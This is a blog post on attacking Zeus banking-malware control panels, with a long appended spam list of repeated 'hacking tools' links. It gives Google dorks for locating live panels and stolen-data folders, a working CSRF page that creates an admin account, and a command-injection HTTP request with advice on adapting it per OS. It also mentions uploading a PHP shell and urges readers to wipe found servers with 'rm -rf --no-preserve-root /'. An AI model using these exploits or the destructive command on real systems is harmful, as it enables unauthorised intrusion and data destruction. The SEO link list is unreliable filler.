Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Read more

1. Hack Tools Download
2. New Hacker Tools
3. Hacking Tools 2019
4. Hacking Tools For Windows Free Download
5. Pentest Automation Tools
6. Hacking Tools 2020
7. Ethical Hacker Tools
8. Pentest Tools Linux
9. Hacker Tool Kit
10. Hacking Tools Hardware
11. Hacker Tools Apk
12. Bluetooth Hacking Tools Kali
13. Hacker Tools Online
14. Pentest Tools Windows
15. Tools 4 Hack
16. New Hacker Tools
17. Usb Pentest Tools
18. Hacking Tools For Kali Linux
19. Hacker Search Tools
20. Hacker Techniques Tools And Incident Handling
21. World No 1 Hacker Software
22. Pentest Tools Github
23. Pentest Reporting Tools
24. New Hacker Tools
25. How To Install Pentest Tools In Ubuntu
26. Hack Tools 2019
27. Hacking Tools For Games
28. Pentest Recon Tools
29. Hack Tools 2019
30. Best Hacking Tools 2019
31. Best Pentesting Tools 2018
32. Tools For Hacker
33. Pentest Tools List
34. Pentest Tools Android
35. Hacker Tools Software
36. Pentest Tools Nmap
37. Hacking Tools Github
38. Hacker Tools For Ios
39. Pentest Tools Port Scanner
40. Hacker Tools Hardware
41. Growth Hacker Tools
42. Pentest Tools For Windows
43. Bluetooth Hacking Tools Kali
44. Pentest Recon Tools
45. Hack App
46. Usb Pentest Tools
47. Hacker Tools Github
48. Top Pentest Tools
49. How To Install Pentest Tools In Ubuntu
50. Hacking Tools Mac
51. Hacking Tools Windows 10
52. Pentest Tools Linux
53. Hack App
54. Hacker Tools Free Download
55. Hack Tools 2019
56. Hack Tools
57. Top Pentest Tools
58. Hacking Tools For Windows 7
59. Hack Tool Apk No Root
60. World No 1 Hacker Software
61. Tools Used For Hacking
62. Hacker Tools 2019
63. Pentest Tools Website Vulnerability
64. Pentest Tools Website
65. Hacking Tools For Kali Linux
66. Hacker Tools Linux
67. Hacking Tools For Kali Linux
68. Hacking Tools Usb
69. Hacking Tools 2019
70. How To Make Hacking Tools
71. Hacking Tools For Beginners
72. Github Hacking Tools
73. Hacker Tools For Windows
74. Pentest Box Tools Download
75. Game Hacking
76. Hack Apps
77. Beginner Hacker Tools
78. Hacking Tools For Kali Linux
79. Hack Tool Apk
80. Pentest Box Tools Download
81. New Hack Tools
82. Wifi Hacker Tools For Windows
83. Hack Tools Pc
84. Hacking Tools
85. Hack And Tools
86. Hacking Tools Windows
87. Pentest Tools Github
88. Pentest Tools Subdomain
89. Pentest Tools Download
90. New Hacker Tools
91. Hacker Tools Online
92. Pentest Tools Alternative
93. Hacker Tools For Ios
94. Hacker Tools List
95. Physical Pentest Tools
96. Hack Tools
97. Pentest Tools For Android
98. Hacking Apps
99. Kik Hack Tools
100. Pentest Tools Open Source
101. Best Hacking Tools 2020
102. Best Pentesting Tools 2018